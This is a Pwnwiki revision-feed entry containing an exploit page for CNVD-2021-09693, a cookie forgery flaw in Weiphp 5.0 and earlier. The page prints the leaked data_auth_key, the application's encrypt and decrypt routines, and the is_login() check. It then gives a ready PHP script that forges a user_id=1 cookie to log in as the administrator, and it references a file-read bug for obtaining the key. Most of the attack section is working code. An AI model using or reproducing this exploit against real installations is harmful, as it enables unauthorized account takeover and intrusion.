https://pwnwiki.com/index.php?action=history&feed=atom&title=CNVD-2021-09693_Weiphp5.0_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6Cookie%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E%2Fen
CNVD-2021-09693 Weiphp5.0 任意用戶Cookie偽造漏洞/en - Revision history
2026-04-04T03:25:54Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CNVD-2021-09693_Weiphp5.0_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6Cookie%E5%81%BD%E9%80%A0%E6%BC%8F%E6%B4%9E/en&diff=4560&oldid=prev
Pwnwiki: Created page with "Found the encryption method and decryption method based on this key"
2021-06-10T02:48:35Z
<p>Created page with "Found the encryption method and decryption method based on this key"</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==Vulnerability Impact==<br />
<pre><br />
Weiphp <= 5.0<br />
</pre><br />
<br />
<br />
==Exploit==<br />
<br />
First, you need to get the <code>data_auth_key</code> key in the database configuration file<br />
<br />
[[File:Weiphp-15.png |800px]]<br />
<br />
To get this configuration file, please refer to [https://www.pwnwiki.org/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4 %BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E CNVD-2020-68596 Weiphp5.0 front file Arbitrary read vulnerability]<br />
<br />
<br />
<pre><br />
'data_auth_key' => '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T'<br />
</pre><br />
<br />
<br />
Find the place where this key is used globally:<br />
<br />
[[File:Weiphp-16.png |800px]]<br />
<br />
<br />
Found the encryption method and decryption method based on this key<br />
<br />
<br />
Encryption method <code>think_encrypt</code><br />
<br />
<pre><br />
<br />
function think_encrypt($data, $key = '', $expire = 0)<br />
{<br />
$key = md5(empty($key) ? config('database.data_auth_key') : $key);<br />
<br />
$data = base64_encode($data);<br />
$x = 0;<br />
$len = strlen($data);<br />
$l = strlen($key);<br />
$char = '';<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
if ($x == $l) {<br />
$x = 0;<br />
}<br />
<br />
$char .= substr($key, $x, 1);<br />
$x++;<br />
}<br />
<br />
$str = sprintf('%010d', $expire ? $expire + time() : 0);<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
$str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);<br />
}<br />
return str_replace(array(<br />
'+',<br />
'/',<br />
'='<br />
), array(<br />
'-',<br />
'_',<br />
''<br />
), base64_encode($str));<br />
}<br />
</pre><br />
<br />
Decryption method <code>think_decrypt</code><br />
<br />
<pre><br />
function think_decrypt($data, $key = '')<br />
{<br />
$key = md5(empty($key) ? config('database.data_auth_key') : $key);<br />
$data = str_replace(array(<br />
'-',<br />
'_'<br />
), array(<br />
'+',<br />
'/'<br />
), $data);<br />
$mod4 = strlen($data) % 4;<br />
if ($mod4) {<br />
$data .= substr('====', $mod4);<br />
}<br />
$data = base64_decode($data);<br />
$expire = substr($data, 0, 10);<br />
$data = substr($data, 10);<br />
<br />
if ($expire > 0 && $expire < time()) {<br />
return '';<br />
}<br />
$x = 0;<br />
$len = strlen($data);<br />
$l = strlen($key);<br />
$char = $str = '';<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
if ($x == $l) {<br />
$x = 0;<br />
}<br />
<br />
$char .= substr($key, $x, 1);<br />
$x++;<br />
}<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
if (ord(substr($data, $i, 1)) < ord(substr($char, $i, 1))) {<br />
$str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1)));<br />
} else {<br />
$str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1)));<br />
}<br />
}<br />
return base64_decode($str);<br />
}<br />
</pre><br />
<br />
The file <code>application\common.php</code> contains the code to use the decryption method for authentication<br />
<br />
<pre><br />
function is_login()<br />
{<br />
$user = session('user_auth');<br />
if (empty($user)) {<br />
$cookie_uid = cookie('user_id');<br />
if (!empty($cookie_uid)) {<br />
$uid = think_decrypt($cookie_uid);<br />
$userinfo = getUserInfo($uid);<br />
D('common/User')->autoLogin($userinfo);<br />
<br />
$user = session('user_auth');<br />
}<br />
}<br />
if (empty($user)) {<br />
return 0;<br />
} else {<br />
return session('user_auth_sign') == data_auth_sign($user) ? $user['uid'] : 0;<br />
}<br />
}<br />
</pre><br />
<br />
According to the code obtained here, you can know that when user_Id=1, the key will be decrypted to determine whether it is correct, and if it is correct, you can log in to the system<br />
<br />
We can log in to the system by encrypting the cookie obtained with user_id=1 with an encryption code locally<br />
<br />
<pre><br />
<?php<br />
show_source(__FILE__);<br />
function think_encrypt($data, $key = '', $expire = 0)<br />
{<br />
$key = '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T';<br />
$key = md5($key);<br />
<br />
$data = base64_encode($data);<br />
$x = 0;<br />
$len = strlen($data);<br />
$l = strlen($key);<br />
$char = '';<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
if ($x == $l) {<br />
$x = 0;<br />
}<br />
<br />
$char .= substr($key, $x, 1);<br />
$x++;<br />
}<br />
<br />
$str = sprintf('%010d', $expire ? $expire + time() : 0);<br />
<br />
for ($i = 0; $i < $len; $i++) {<br />
$str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);<br />
}<br />
return str_replace(array(<br />
'+',<br />
'/',<br />
'='<br />
), array(<br />
'-',<br />
'_',<br />
''<br />
), base64_encode($str));<br />
}<br />
<br />
echo 'user_id = ' . think_encrypt($_GET['user_id']);<br />
?><br />
</pre><br />
<br />
<br />
Add <code>cookie: user_id=xxxxxxxx</code> to log in successfully<br />
<br />
[[File:Weiphp-18.png |800px]]<br />
<br />
<br />
==Reference==<br />
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7Cookie%E4%BC%AA%E9%80%A0%20CNVD-2021-09693.html</div>
Pwnwiki